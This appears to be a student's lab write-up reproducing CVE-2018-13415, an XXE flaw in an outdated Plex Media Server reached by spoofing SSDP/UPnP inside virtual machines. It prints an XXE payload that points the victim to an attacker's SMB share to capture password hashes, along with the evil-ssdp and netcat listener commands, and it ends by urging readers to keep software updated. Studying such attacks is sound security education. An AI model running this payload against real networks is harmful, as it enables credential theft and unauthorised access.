“All Your Base Belong to Us” One good example of why it is important to keep your software up-to-date.
I explore the ability to take over a system using the SSDP/UPnP protocol through an outdated version of Plex Media Server.
Definitions:
Plex Media Server “Plex is a global streaming media service and a client–server media player platform, made by Plex, Inc. The Plex Media Server organizes video, audio, and photos from a user’s collections and from online services, and streams it to the players. The official clients and unofficial third-party clients run on mobile devices, smart TVs, streaming boxes, and in web apps.” (www.wikipedia.org/wiki/Plex_(company))
Plex Pass is plex.tv subscription service that gives you the premium level access to most of the features plex has to offer and early previewing of upgrades, apps, and discounts of other subscription add-ons.
UPNP “Universal Plug and Play (UPnP) is a set of networking protocols that permits networked devices, such as personal computers, printers, Internet gateways, Wi-Fi access points and mobile devices to seamlessly discover each other’s presence on the network and establish functional network services. UPnP is intended primarily for residential networks without enterprise-class devices.” (www. wikipedia.org/wiki/Universal_Plug_and_Play)
SSDP “Simple Service Discovery Protocol (SSDP) is a network protocol based on the Internet protocol suite for advertisement and discovery of network services and presence information. It accomplishes this without assistance of server-based configuration mechanisms, such as Dynamic Host Configuration Protocol (DHCP) or Domain Name System (DNS), and without special static configuration of a network host. SSDP is the basis of the discovery protocol of Universal Plug and Play (UPnP) and is intended for use in residential or small office environments.” (www.wikipedia.org/wiki/Simple_Service_Discovery_Protocol)
VM “Virtual Machine (VM) is the virtualization/emulation of a computer system. Virtual machines are based on computer architectures and provide functionality of a physical computer. Their implementations may involve specialized hardware, software, or a combination.” (www.wikipedia.org/wiki/Virtual_machine)
CVE “Common Vulnerabilities and Exposures (CVE) system provides a reference-method for publicly known information-security vulnerabilities and exposures. The United States’ National Cybersecurity FFRDC, operated by The Mitre Corporation, maintains the system, with funding from the US National Cyber Security Division of the US Department of Homeland Security.” (www.wikipedia.org/wiki/Common_Vulnerabilities_and_Exposures)
Credit:
CVE-2018–13415 was discovered and reported by Chris Moberly @ The Missing Link Security.
Environment:
Windows 10 running in Oracle VM
Plex-media-server-1.1.0.831 running in Windows 10 VM
Kali Linux running in Oracle VM
Host System — Windows 10 Educational Version 1909
Description of vulnerability:
CVE-2018–13415 | “9.8 Critical”
Plex Media Server 1.13.2.5154 and previous is vulnerable to XXE by XML through the SSDP/UPnP functionality This vulnerability can give arbitrary access to files from the filesystem up to the permission level of the account user. This vulnerability can also give attacker the ability to view passwords in clear text. Or give the attacker remote command execution ability in Windows systems.
Description of this attack:
This is a XML External Entity (XXE) remote attack that requires no authentication from a user to get access to the system by phishing SSDP. Using the following xml
<?xml version=”1.0" encoding=”ISO-8859–1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM “file://///$smbServer/smb/hash.jpg” >
<!ENTITY xxe-url SYSTEM “http://$localIp:$localPort/ssdp/xxe.html" >
]>
<hello>&xxe;&xxe-url;</hello>
<root>
<specVersion>
<major>1</major>
<minor>0</minor>
</specVersion>
<device>
we will be able to gain access to the victim’s machine. This will be done with the SSDP/UPNP handshake and this will cause Plex to behave in unintended ways that will permit us access.
Set up and process:
I set up and started both my kail and Windows 10 environments in VMs. I then installed a fresh Plex-media-server version 1.1.0.831 to run in the Windows 10 VM. I then logged into my Plex-pass premium account due to the reason that plex will not actually start or run fully without internet access and connected account.
Next installed Evil_SSDP into my kali VM and set it up with the following command “evil-ssdp eth0 -t xxe-smb”. Also setting up NetCat to listen on port 445 using the command “sudo nc -nlvp 445”
Evil-SSPD spoofs SSDP on local networks posing as a generic UPnP device. This tool can assist in the lateral movement across networks.
After setting up both Evil-SSDP and NetCat in a no contact situation we would have to wait for plex to be restarted. In this scenario I close and restart Plex. After a few tries and some code tweaks with the help of my college instructor this is the output I was met with when the process executed flawlessly.
And we now have access to the machine.
Often, I was hit with errors like this:
I think this was due to outside the box interference from other devices on my network, I’ll need to go through them one by one after learning about SSDP/UPnP vulnerabilities. This interference was a factor due to the issue that to run this vulnerability exploit I could not conduct it in a closed sandbox environment because of the Plex requirement to have an active internet connection to run with a level of account privileges.
Conclusion:
While this is not a concern in later versions of plex media server. This might exist in other applications that has not been tested for this that use UPnP openly on a network. This could be an issue in most smart home devices due to the fact of the extreme pressure to push from concept to market in lightning fast speeds that more often than not end up in the homes of consumers before they have been fully tested. This lack of focus on pen-testing devices and apps could result in more widespread ring doorbell & nanny-cam stalker incidences of the recent past. Beware of the devices on your network and never blindly trust the new shiny thing (IoT devices). Thank you for reading my report.
